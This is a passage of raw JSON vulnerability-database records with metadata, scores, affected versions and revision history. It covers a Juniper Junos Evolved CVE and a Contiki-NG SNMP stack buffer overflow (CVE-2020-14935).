"02ed1e0f56921c8e43e32491f72c14ea", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "fc8c24dea87350db8ab64bd92dbf2a19", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0292", "id": "CVE-2021-0292", "immutableFields": [], "lastseen": "2021-07-16T07:48:17", "modified": "2021-07-15T21:15:00", "objectVersion": "1.5", "published": "2021-07-15T20:15:00", "references": ["https://kb.juniper.net/JSA11194"], "reporter": "sirt@juniper.net", "title": "CVE-2021-0292", "type": "cve", "viewCount": 17}, "different_elements": ["cvss3"], "edition": 1, "lastseen": "2021-07-16T07:48:17"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "ac80fb64bd8450a5c0e36266cf4d68ad"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "9fd887327a4cc2896caaaa7fb333216a"}, {"key": "cpe23", "hash": "7b548196a563bd8161c0ff0170b8a3ef"}, {"key": "cpeConfiguration", "hash": "05dc37d010066824bb10d27d95805024"}, {"key": "cvelist", "hash": "fc8c24dea87350db8ab64bd92dbf2a19"}, {"key": "cvss", "hash": "98c08074da8aaca6af3906c60486197f"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "7dd7925ad368cc8c6fb5df427ff6ba17"}, {"key": "description", "hash": "1c73951065cb084f6f8063da2a01d272"}, {"key": "extraReferences", "hash": "7a5fc5c63a97e8df4088e0e9ac51f139"}, {"key": "href", "hash": "ae93511931d905bc8db96ac6ae2a0ea6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "57a0f11d42442d75d2d105e84d418c9a"}, {"key": "published", "hash": "4431ee369bdb0e469caf9f1ca35839cf"}, {"key": "references", "hash": "9405a9560dcaac9e91cb939f52b257ca"}, {"key": "reporter", "hash": "02ed1e0f56921c8e43e32491f72c14ea"}, {"key": "title", "hash": "821eea281a2815c3064633ed4b9795cd"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "244bfc385193b8d5350ac44f17a4ffc69d0a0e5175c98895399243230614506e", "viewCount": 19, "enchantments": {"dependencies": {"references": [], "modified": "2021-07-30T07:40:12", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2021-07-30T07:40:12", "rev": 2}, "twitter": {"counter": 4, "modified": "2021-07-28T14:21:04", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1420788815996796934", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/lmpXQ0hMNx?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1420788815996796934", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/lmpXQ0hMNx?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1420788881138536449", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/9ag6nytbpS?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1420788881138536449", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/9ag6nytbpS?amp=1"}]}}, "objectVersion": "1.6", "cpe": ["cpe:/o:juniper:junos_evolved:20.1", "cpe:/o:juniper:junos_evolved:20.2", "cpe:/o:juniper:junos_evolved:19.4"], "affectedSoftware": [{"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.1"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "20.2"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "19.4"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "19.4"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "19.4"}, {"cpeName": "juniper:junos_evolved", "name": "juniper junos evolved", "operator": "eq", "version": "19.4"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:19.4:r2-s1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r1-s1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:19.4:r2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:19.4:r1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:19.4:r2-s2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.2:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:juniper:junos_evolved:20.1:r2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://kb.juniper.net/JSA11194", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://kb.juniper.net/JSA11194"}], "cvss2": {}, "cvss3": {}, "cpe23": ["cpe:2.3:o:juniper:junos_evolved:19.4:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:19.4:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:19.4:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.2:-:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r1-s1:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:19.4:r2:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:r2-s3:*:*:*:*:*:*", "cpe:2.3:o:juniper:junos_evolved:20.1:-:*:*:*:*:*:*"], "cwe": ["CWE-400"], "scheme": null}, {"id": "CVE-2020-14935", "bulletinFamily": "NVD", "title": "CVE-2020-14935", "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "published": "2020-08-18T17:15:00", "modified": "2020-08-25T20:02:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "reporter": "cve@mitre.org", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "cvelist": ["CVE-2020-14935"], "type": "cve", "lastseen": "2021-04-23T01:09:34", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "contiki-ng:contiki-ng", "name": "contiki-ng", "operator": "le", "version": "4.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:contiki-ng:contiki-ng:4.5"], "cpe23": ["cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*", "versionEndIncluding": "4.5", "versionStartIncluding": "4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-14935"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-787"], "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T07:36:59", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T07:36:59", "rev": 2, "value": 2.0, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/contiki-ng/contiki-ng/issues/1353", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/contiki-ng/contiki-ng/issues/1353"}, {"name": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing"}], "hash": "087682afc5cf50d0b6a7205668b4773a5cddf96db74f5b0943c91fda09a6cef5", "hashmap": [{"hash": "038e97d519e2335378fc68e6ac0c9dd5", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "7023fa44f77c91f4bbf327b9e53bae01", "key": "href"}, {"hash": "b2240ad4dbd21a1566c74afb26b5fd11", "key": "cpe"}, {"hash": "789b17dda516bc9d73eaa1788c0add66", "key": "cpe23"}, {"hash": "c088872f23374c4cfaa901cb51cddd7c", "key": "cpeConfiguration"}, {"hash": "0bc6fd7c973557ca85aace2aedf9a089", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "846d70bca5916c9b4ee5ab56713aeca3", "key": "affectedSoftware"}, {"hash": "cd414680a1f7198694611720e80e992e", "key": "references"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "ebee258103519fe1d0e99f103020f695", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "ce1a3bc1d546336624053ad9c08536a3", "key": "modified"}, {"hash": "c6cebcae4b1ac3fc7051b068b9030649", "key": "extraReferences"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "1a1fd0d8d1bd658f323f5ed98068ae3e", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "id": "CVE-2020-14935", "immutableFields": [], "lastseen": "2021-02-02T07:36:59", "modified": "2020-08-25T20:02:00", "objectVersion": "1.5", "published": "2020-08-18T17:15:00", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "reporter": "cve@mitre.org", "title": "CVE-2020-14935", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T07:36:59"}, {"bulletin": {"affectedSoftware": [{"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.3"}, {"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.1"}, {"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.5"}, {"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.0"}, {"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.4"}, {"name": "contiki-ng contiki-ng", "operator": "eq", "version": "4.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:contiki-ng:contiki-ng:4.2", "cpe:/a:contiki-ng:contiki-ng:4.4", "cpe:/a:contiki-ng:contiki-ng:4.5", "cpe:/a:contiki-ng:contiki-ng:4.1", "cpe:/a:contiki-ng:contiki-ng:4.0", "cpe:/a:contiki-ng:contiki-ng:4.3"], "cpe23": [], "cvelist": ["CVE-2020-14935"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-787"], "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-08-26T11:18:21", "references": [], "rev": 2}, "score": {"modified": "2020-08-26T11:18:21", "rev": 2, "value": 2.0, "vector": "NONE"}}, "hash": "f86a825eb382a37d2aed479ba499278c6658658012823e8ba6fce58ef449a101", "hashmap": [{"hash": "038e97d519e2335378fc68e6ac0c9dd5", "key": "description"}, {"hash": "7023fa44f77c91f4bbf327b9e53bae01", "key": "href"}, {"hash": "0bc6fd7c973557ca85aace2aedf9a089", "key": "published"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "3a0570bf75f2b68e318b90fc9feb60c2", "key": "affectedSoftware"}, {"hash": "cd414680a1f7198694611720e80e992e", "key": "references"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "ebee258103519fe1d0e99f103020f695", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1afa1b0601775a3bad33deb3e652c4f1", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "ce1a3bc1d546336624053ad9c08536a3", "key": "modified"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "1a1fd0d8d1bd658f323f5ed98068ae3e", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "id": "CVE-2020-14935", "lastseen": "2020-08-26T11:18:21", "modified": "2020-08-25T20:02:00", "objectVersion": "1.3", "published": "2020-08-18T17:15:00", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "reporter": "cve@mitre.org", "title": "CVE-2020-14935", "type": "cve", "viewCount": 2}, "differentElements": ["cpe23", "cvss3", "cpe", "affectedSoftware"], "edition": 2, "lastseen": "2020-08-26T11:18:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "contiki-ng:contiki-ng", "name": "contiki-ng", "operator": "le", "version": "4.5"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:contiki-ng:contiki-ng:4.5"], "cpe23": ["cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*", "versionEndIncluding": "4.5", "versionStartIncluding": "4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-14935"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-787"], "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-10-03T12:55:50", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T12:55:50", "rev": 2, "value": 2.0, "vector": "NONE"}}, "hash": "b3d78d463be006d7117a50ce64f03374c6fa81567c65ca756818bf73f33d095a", "hashmap": [{"hash": "038e97d519e2335378fc68e6ac0c9dd5", "key": "description"}, {"hash": "7023fa44f77c91f4bbf327b9e53bae01", "key": "href"}, {"hash": "b2240ad4dbd21a1566c74afb26b5fd11", "key": "cpe"}, {"hash": "789b17dda516bc9d73eaa1788c0add66", "key": "cpe23"}, {"hash": "c088872f23374c4cfaa901cb51cddd7c", "key": "cpeConfiguration"}, {"hash": "0bc6fd7c973557ca85aace2aedf9a089", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "846d70bca5916c9b4ee5ab56713aeca3", "key": "affectedSoftware"}, {"hash": "cd414680a1f7198694611720e80e992e", "key": "references"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "ebee258103519fe1d0e99f103020f695", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "ce1a3bc1d546336624053ad9c08536a3", "key": "modified"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "1a1fd0d8d1bd658f323f5ed98068ae3e", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "id": "CVE-2020-14935", "lastseen": "2020-10-03T12:55:50", "modified": "2020-08-25T20:02:00", "objectVersion": "1.3", "published": "2020-08-18T17:15:00", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "reporter": "cve@mitre.org", "title": "CVE-2020-14935", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-10-03T12:55:50"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "contiki-ng:contiki-ng", "name": "contiki-ng", "operator": "le", "version": "*"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:contiki-ng:contiki-ng:4.5"], "cpe23": ["cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:contiki-ng:contiki-ng:4.5:*:*:*:*:*:*:*", "versionEndIncluding": "4.5", "versionStartIncluding": "4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2020-14935"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cwe": ["CWE-787"], "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the return address from the function. As a result, the code execution path may be redirected to an address provided in the SNMP bulk get payload. If the target architecture uses common addressing space for program and data memory, it may also be possible to supply code in the SNMP request payload, and redirect the execution path to the remotely injected code, by modifying the function's return address.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-11-30T02:29:26", "references": [], "rev": 2}, "score": {"modified": "2020-11-30T02:29:26", "rev": 2, "value": 2.0, "vector": "NONE"}}, "hash": "ccacb5af8b35e47c74a8c0ae9dfa2b3cbe4a461d4c7073ac2df3f3b42429f548", "hashmap": [{"hash": "038e97d519e2335378fc68e6ac0c9dd5", "key": "description"}, {"hash": "7023fa44f77c91f4bbf327b9e53bae01", "key": "href"}, {"hash": "b2240ad4dbd21a1566c74afb26b5fd11", "key": "cpe"}, {"hash": "789b17dda516bc9d73eaa1788c0add66", "key": "cpe23"}, {"hash": "c088872f23374c4cfaa901cb51cddd7c", "key": "cpeConfiguration"}, {"hash": "0bc6fd7c973557ca85aace2aedf9a089", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e63509ce8b627fb239a5a63969122026", "key": "cvss2"}, {"hash": "cd414680a1f7198694611720e80e992e", "key": "references"}, {"hash": "661a69d232e07fc7aadb258325e71df8", "key": "cwe"}, {"hash": "ad35358d166de03a84a3a9280d95337a", "key": "cvss3"}, {"hash": "ebee258103519fe1d0e99f103020f695", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9a915c2138ba04df5f54b03e4b9a1b7e", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "ce1a3bc1d546336624053ad9c08536a3", "key": "modified"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "1a1fd0d8d1bd658f323f5ed98068ae3e", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14935", "id": "CVE-2020-14935", "lastseen": "2020-11-30T02:29:26", "modified": "2020-08-25T20:02:00", "objectVersion": "1.3", "published": "2020-08-18T17:15:00", "references": ["https://drive.google.com/file/d/1qp3ZXaFRiR_imWg0lUbI7-D-hIT268EB/view?usp=sharing", "https://github.com/contiki-ng/contiki-ng/issues/1353"], "reporter": "cve@mitre.org", "title": "CVE-2020-14935", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-11-30T02:29:26"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2020-14935"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Buffer overflows were discovered in Contiki-NG 4.4 through 4.5, in the SNMP bulk get request response encoding function. The function parsing the received SNMP request does not verify the input message's requested variables against the capacity of the internal SNMP engine buffer. When a bulk get request response is assembled, a stack buffer dedicated for OIDs (with a limited capacity) is allocated in snmp_engine_get_bulk(). When snmp_engine_get_bulk() is populating the stack buffer, an overflow condition may occur due to lack of input length validation. This makes it possible to overwrite stack regions beyond the allocated buffer, including the 